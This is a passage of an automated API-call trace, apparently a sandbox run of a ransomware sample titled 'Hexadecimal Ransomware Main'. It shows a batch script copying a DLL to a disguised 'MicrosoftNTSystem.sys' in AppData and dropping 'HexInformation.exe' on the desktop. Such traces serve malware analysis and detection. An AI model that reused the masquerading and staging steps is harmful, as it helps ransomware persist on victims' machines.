(lpFileName="rd000db.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\rd000db.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419e000, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x9c [0107.509] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0107.509] _get_osfhandle (_FileHandle=3) returned 0x9c [0107.509] GetFileType (hFile=0x9c) returned 0x1 [0107.509] SetErrorMode (uMode=0x0) returned 0x0 [0107.509] SetErrorMode (uMode=0x1) returned 0x0 [0107.510] GetFullPathNameW (in: lpFileName="rd000db.dll", nBufferLength=0xffce, lpBuffer=0x1dc258300c0, lpFilePart=0x407419e050 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\rd000db.dll", lpFilePart=0x407419e050*="rd000db.dll") returned 0x23 [0107.510] SetErrorMode (uMode=0x0) returned 0x1 [0107.510] _get_osfhandle (_FileHandle=3) returned 0x9c [0107.510] ReadFile (in: hFile=0x9c, lpBuffer=0x1dc25610000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x407419e084, lpOverlapped=0x0 | out: lpBuffer=0x1dc25610000*, lpNumberOfBytesRead=0x407419e084*=0x200, lpOverlapped=0x0) returned 1 [0107.511] malloc (_Size=0x1ff9c) returned 0x1dc25850070 [0107.511] ??_V@YAXPEAX@Z () returned 0x1dc25850070 [0107.512] SetErrorMode (uMode=0x0) returned 0x0 [0107.512] SetErrorMode (uMode=0x1) returned 0x0 [0107.512] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys", nBufferLength=0xffce, lpBuffer=0x1dc25850070, lpFilePart=0x407419dde0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys", lpFilePart=0x407419dde0*="MicrosoftNTSystem.sys") returned 0x47 [0107.513] SetErrorMode (uMode=0x0) returned 0x1 [0107.513] _wcsicmp (_String1="C:\\Users\\FD1HVy\\Desktop\\rd000db.dll", _String2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys") returned 3 [0107.513] ??_V@YAXPEAX@Z () returned 0x1 [0107.535] GetProcessHeap () returned 0x1dc256b0000 [0107.535] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x260) returned 0x1dc256bc4a0 [0107.535] _wcsicmp (_String1="MicrosoftNTSystem.sys", _String2=".") returned 63 [0107.535] _wcsicmp (_String1="MicrosoftNTSystem.sys", _String2="..") returned 63 [0107.535] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\microsoftntsystem.sys")) returned 0xffffffff [0107.535] GetLastError () returned 0x2 [0107.535] malloc (_Size=0xffce) returned 0x1dc25850070 [0107.536] ??_V@YAXPEAX@Z () returned 0x1dc25850070 [0107.537] malloc (_Size=0xffce) returned 0x1dc25860050 [0107.537] ??_V@YAXPEAX@Z () returned 0x1dc25860050 [0107.537] ??_V@YAXPEAX@Z () returned 0x1 [0107.537] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys", nBufferLength=0x7fe7, lpBuffer=0x1dc25850070, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys", lpFilePart=0x0) returned 0x47 [0107.538] ??_V@YAXPEAX@Z () returned 0x1 [0107.539] malloc (_Size=0x1ff9c) returned 0x1dc25850070 [0107.539] ??_V@YAXPEAX@Z () returned 0x1dc25850070 [0107.541] SetErrorMode (uMode=0x0) returned 0x0 [0107.541] SetErrorMode (uMode=0x1) returned 0x0 [0107.541] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys", nBufferLength=0xffce, lpBuffer=0x1dc25850070, lpFilePart=0x407419dde0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys", lpFilePart=0x407419dde0*="MicrosoftNTSystem.sys") returned 0x47 [0107.541] SetErrorMode (uMode=0x0) returned 0x1 [0107.541] _wcsicmp (_String1="C:\\Users\\FD1HVy\\Desktop\\rd000db.dll", _String2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys") returned 3 [0107.541] ??_V@YAXPEAX@Z () returned 0x1 [0107.542] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\microsoftntsystem.sys")) returned 0xffffffff [0107.542] CopyFileExW (lpExistingFileName="rd000db.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\rd000db.dll"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\microsoftntsystem.sys"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x7ff67b909834, dwCopyFlags=0x0) returned 1 [0108.621] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\microsoftntsystem.sys")) returned 0x20 [0108.621] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys", dwFileAttributes=0x20) returned 1 [0108.622] _close (_FileHandle=3) returned 0 [0108.622] FindNextFileW (in: hFindFile=0x1dc256bee40, lpFindFileData=0x1dc256be410 | out: lpFindFileData=0x1dc256be410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd40e0104, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd40e0104, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd42a9d0f, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0xa35af, dwReserved0=0x0, dwReserved1=0x0, cFileName="rd000db.dll", cAlternateFileName="")) returned 0 [0108.623] GetLastError () returned 0x12 [0108.623] FindClose (in: hFindFile=0x1dc256bee40 | out: hFindFile=0x1dc256bee40) returned 1 [0108.623] ??_V@YAXPEAX@Z () returned 0x1 [0108.625] ??_V@YAXPEAX@Z () returned 0x1 [0108.629] ??_V@YAXPEAX@Z () returned 0x1 [0108.645] ??_V@YAXPEAX@Z () returned 0x1 [0108.651] _vsnwprintf (in: _Buffer=0x7ff67b920310, _BufferCount=0x103, _Format="%9d", _ArgList=0x407419e9d8 | out: _Buffer=" 1") returned 9 [0108.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0108.651] GetFileType (hFile=0x50) returned 0x2 [0108.651] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0108.651] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x407419e8c8 | out: lpMode=0x407419e8c8) returned 1 [0108.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0108.658] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x50, lpConsoleScreenBufferInfo=0x407419e900 | out: lpConsoleScreenBufferInfo=0x407419e900) returned 1 [0108.751] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x7ff67b917f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14 [0108.751] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x7ff67b917f60, nSize=0x2000, Arguments=0x407419e9a0 | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b [0108.751] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff67b917f60*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0x407419e8f0, lpReserved=0x0 | out: lpBuffer=0x7ff67b917f60*, lpNumberOfCharsWritten=0x407419e8f0*=0x1b) returned 1 [0108.757] NtSetInformationProcess (ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x407419e9fc, ProcessInformationLength=0x4) returned 0x0 [0108.757] ??_V@YAXPEAX@Z () returned 0x1 [0108.761] _get_osfhandle (_FileHandle=1) returned 0x50 [0108.761] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0108.764] _get_osfhandle (_FileHandle=1) returned 0x50 [0108.764] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0108.770] _get_osfhandle (_FileHandle=0) returned 0x4c [0108.770] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0108.772] SetConsoleInputExeNameW () returned 0x1 [0108.772] GetConsoleOutputCP () returned 0x1b5 [0108.774] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0108.774] SetThreadUILanguage (LangId=0x0) returned 0x409 [0108.777] ??_V@YAXPEAX@Z () returned 0x1 [0108.781] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419eef8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0108.781] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0108.781] _get_osfhandle (_FileHandle=3) returned 0xa0 [0108.781] SetFilePointer (in: hFile=0xa0, lDistanceToMove=181, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb5 [0108.782] GetProcessHeap () returned 0x1dc256b0000 [0108.782] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bc4a0) returned 1 [0108.782] GetProcessHeap () returned 0x1dc256b0000 [0108.782] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be670) returned 1 [0108.782] GetProcessHeap () returned 0x1dc256b0000 [0108.782] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bed20) returned 1 [0108.782] GetProcessHeap () returned 0x1dc256b0000 [0108.782] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be400) returned 1 [0108.782] GetProcessHeap () returned 0x1dc256b0000 [0108.782] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256beae0) returned 1 [0108.782] GetProcessHeap () returned 0x1dc256b0000 [0108.782] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be330) returned 1 [0108.782] GetProcessHeap () returned 0x1dc256b0000 [0108.782] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256becc0) returned 1 [0108.782] GetProcessHeap () returned 0x1dc256b0000 [0108.782] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bef60) returned 1 [0108.782] GetProcessHeap () returned 0x1dc256b0000 [0108.782] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bab00) returned 1 [0108.783] GetProcessHeap () returned 0x1dc256b0000 [0108.783] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be260) returned 1 [0108.783] GetProcessHeap () returned 0x1dc256b0000 [0108.783] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bb180) returned 1 [0108.783] GetProcessHeap () returned 0x1dc256b0000 [0108.783] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b9920) returned 1 [0108.783] GetProcessHeap () returned 0x1dc256b0000 [0108.783] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bba70) returned 1 [0108.783] VirtualFree (lpAddress=0x1dc25610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0108.783] _get_osfhandle (_FileHandle=3) returned 0xa0 [0108.784] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb5 [0108.784] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x407419eeb0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x407419eeb0*=0x134, lpOverlapped=0x0) returned 1 [0108.787] SetFilePointer (in: hFile=0xa0, lDistanceToMove=244, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4 [0108.787] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=63, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="copy HexIF.hex C:\\Users\\%username%\\desktop\\HexInformation.exe\r\nWindows\\MicrosoftNTSystem.sys\r\n") returned 63 [0108.787] _get_osfhandle (_FileHandle=3) returned 0xa0 [0108.787] GetFileType (hFile=0xa0) returned 0x1 [0108.787] _get_osfhandle (_FileHandle=3) returned 0xa0 [0108.787] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf4 [0108.787] GetProcessHeap () returned 0x1dc256b0000 [0108.787] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4012) returned 0x1dc256d86c0 [0108.788] GetProcessHeap () returned 0x1dc256b0000 [0108.788] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4010) returned 0x1dc256dc6e0 [0108.788] GetProcessHeap () returned 0x1dc256b0000 [0108.788] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x22) returned 0x1dc256c30e0 [0108.788] GetEnvironmentVariableW (in: lpName="username", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="FD1HVy") returned 0x6 [0108.788] GetProcessHeap () returned 0x1dc256b0000 [0108.788] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c30e0) returned 1 [0108.788] GetProcessHeap () returned 0x1dc256b0000 [0108.788] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256dc6e0) returned 1 [0108.788] GetProcessHeap () returned 0x1dc256b0000 [0108.788] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256d86c0) returned 1 [0108.791] _wcsicmp (_String1="copy", _String2=")") returned 58 [0108.791] _wcsicmp (_String1="FOR", _String2="copy") returned 3 [0108.791] _wcsicmp (_String1="FOR/?", _String2="copy") returned 3 [0108.791] _wcsicmp (_String1="IF", _String2="copy") returned 6 [0108.791] _wcsicmp (_String1="IF/?", _String2="copy") returned 6 [0108.791] _wcsicmp (_String1="REM", _String2="copy") returned 15 [0108.791] _wcsicmp (_String1="REM/?", _String2="copy") returned 15 [0108.791] GetProcessHeap () returned 0x1dc256b0000 [0108.791] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256bba70 [0108.791] GetProcessHeap () returned 0x1dc256b0000 [0108.791] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1a) returned 0x1dc256c3380 [0108.792] GetProcessHeap () returned 0x1dc256b0000 [0108.792] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x7c) returned 0x1dc256c1750 [0108.793] _tell (_FileHandle=3) returned 244 [0108.793] _close (_FileHandle=3) returned 0 [0108.793] malloc (_Size=0xffce) returned 0x1dc257e0160 [0108.795] ??_V@YAXPEAX@Z () returned 0x1dc257e0160 [0108.796] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0108.796] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0108.796] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0108.796] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0108.796] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0108.796] GetConsoleTitleW (in: lpConsoleTitle=0x407419eca0, nSize=0x104 | out: lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 0x2c [0108.825] malloc (_Size=0xffce) returned 0x1dc257f0140 [0108.825] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0108.826] malloc (_Size=0xffce) returned 0x1dc25800120 [0108.826] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0108.827] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0108.827] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0108.827] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0108.827] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0108.827] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0108.827] ??_V@YAXPEAX@Z () returned 0x1 [0108.829] GetProcessHeap () returned 0x1dc256b0000 [0108.829] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe8) returned 0x1dc256bcea0 [0108.829] GetProcessHeap () returned 0x1dc256b0000 [0108.829] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256bcea0, Size=0x7c) returned 0x1dc256bcea0 [0108.829] GetProcessHeap () returned 0x1dc256b0000 [0108.829] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256bcea0) returned 0x7c [0108.829] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0108.829] GetProcessHeap () returned 0x1dc256b0000 [0108.829] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x86) returned 0x1dc256c13f0 [0108.829] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1dc257b0080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0108.829] GetProcessHeap () returned 0x1dc256b0000 [0108.829] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x58) returned 0x1dc256bee40 [0108.829] GetProcessHeap () returned 0x1dc256b0000 [0108.829] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x58) returned 0x1dc256bf0e0 [0108.829] GetProcessHeap () returned 0x1dc256b0000 [0108.829] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x20) returned 0x1dc256c33b0 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0108.830] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0108.831] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0108.831] GetProcessHeap () returned 0x1dc256b0000 [0108.831] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c33b0) returned 1 [0108.832] GetProcessHeap () returned 0x1dc256b0000 [0108.832] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x20) returned 0x1dc256c32f0 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0108.832] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0108.833] 